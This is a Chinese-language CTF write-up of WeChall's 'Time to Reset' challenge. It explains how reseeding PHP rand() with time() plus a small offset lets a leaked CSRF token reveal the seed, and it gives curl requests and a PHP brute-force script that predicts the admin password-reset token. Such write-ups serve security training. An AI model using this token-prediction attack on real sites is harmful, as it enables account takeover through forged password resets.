WeChall - Time to Reset

Posted on In Views: Disqus:

Challenge

提交 admin@wechall.net 的 password reset token。Token 绑定 session,源码公开。

Solution

漏洞分析

源码(?highlight=christmas)暴露了 token 生成逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
// 每次请求(GET 或 POST)都重新播种
srand(time() + rand(0, 100));
$csrf = ttr_random(32);       // 页面中 <input name="csrf">

// POST reset 时额外生成 token
$token = ttr_random(16);      // 即要预测的目标

function ttr_random($len, $alpha='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
{
    $alphalen = strlen($alpha) - 1;
    $key = '';
    for ($i = 0; $i < $len; $i++) {
        $key .= $alpha[rand(0, $alphalen)];
    }
    return $key;
}

种子 = time() + rand(0, 100),仅 101 种可能。CSRF token(32 字符)是种子后的首次 32 次 rand() 输出,直接暴露在页面中。

页面中的两个 token

挑战页面包含两个 hidden input:

  • csrf(32 字符)— 位于 password reset form 内 

    1
    2
    3
    <tr><td colspan="3">
      <input type="hidden" name="csrf" value="5faruVeXQSpw78BPrkYpJqPqmmJfKXdI" />
    </td>
    右键 → 查看页面源代码,搜索 name="csrf" 即可找到。

  • gwf3_csrf(8 字符)— 位于 solution form 内,用于提交答案 

    1
    <input type="hidden" name="gwf3_csrf" value="eIt0IMws" />

破解流程

关键:用来破解读取的不是 GET 页面的 CSRF,而是 POST 请求返回页面的 CSRF。因为每次请求 PHP 都重新 srand(time()+rand(0,100)),token 和页面 CSRF 在同一个种子下连续生成(32 + 16 次 rand 调用)。必须先 POST reset 触发 token 生成,再用响应页面中的新 CSRF 推导同一种子下的 token。

Step 1 — GET 页面,提取 CSRF 和 gwf3_csrf

1
2
3
4
curl -sk --max-time 15 -D /tmp/ttr_headers.txt \
  -b 'WC=40700784-72047-P62VMhsWxh3elcYN' \
  'https://www.wechall.net/en/challenge/time_to_reset/' \
  | grep -oP 'name="csrf"\s*value="\K[^"]+'

输出: 

1
lGYstQosLkv6kYxtH6Ftvj6GAjEEMklq

用同样的方式提取 gwf3_csrf

1
grep -oP 'name="gwf3_csrf"\s*value="\K[^"]+'

Step 2 — POST password reset,触发 token 生成

1
2
3
4
5
6
curl -sk --max-time 15 -D /tmp/ttr_headers2.txt \
  -b 'WC=40700784-72047-P62VMhsWxh3elcYN' \
  --data-urlencode 'email=admin@wechall.net' \
  --data-urlencode 'reset=Request a Password reset' \
  --data-urlencode 'csrf=lGYstQosLkv6kYxtH6Ftvj6GAjEEMklq' \
  'https://www.wechall.net/en/challenge/time_to_reset/'

响应中会包含 msg_mail_sent 提示,以及一个全新csrf(同一请求中生成的): 

1
<input type="hidden" name="csrf" value="7MkocZHPcc6rkDkGVaSRVltE1ONJH5zM" />

Step 3 — 从响应头获取服务器时间

1
2
grep -i '^date:' /tmp/ttr_headers2.txt
# Date: Sat, 13 Jun 2026 12:13:31 GMT

转换为 epoch:1781352811

Step 4 — PHP 离线暴力搜索种子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
$csrf = "7MkocZHPcc6rkDkGVaSRVltE1ONJH5zM";  // 从 POST 响应提取
$server_time = 1781352811;                       // 从 Date header 提取
$alpha = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$alphalen = strlen($alpha) - 1;

for ($t = $server_time - 3; $t <= $server_time + 3; $t++) {
    for ($offset = 0; $offset <= 100; $offset++) {
        $seed = $t + $offset;
        srand($seed);

        $generated = '';
        for ($i = 0; $i < 32; $i++) {
            $generated .= $alpha[rand(0, $alphalen)];
        }

        if ($generated === $csrf) {
            // 找到种子!预测 token(接下来 16 次 rand)
            $token = '';
            for ($i = 0; $i < 16; $i++) {
                $token .= $alpha[rand(0, $alphalen)];
            }
            echo "SEED=$seed\nTOKEN=$token\n";
            exit(0);
        }
    }
}
echo "NOT_FOUND\n";

执行: 

1
2
3
php brute_force.php
# SEED=1781352853
# TOKEN=XfmLddQ4n1NuBpUD

搜索空间仅 101(偏移量)× 7(±3 秒)= 707 种组合,毫秒级出结果。

Step 5 — 提交预测的 token

1
2
3
4
5
6
curl -sk --max-time 15 \
  -b 'WC=40700784-72047-P62VMhsWxh3elcYN' \
  --data-urlencode 'answer=XfmLddQ4n1NuBpUD' \
  --data-urlencode 'solve=Submit' \
  --data-urlencode 'gwf3_csrf=eIt0IMws' \
  'https://www.wechall.net/en/challenge/time_to_reset/'
XfmLddQ4n1NuBpUD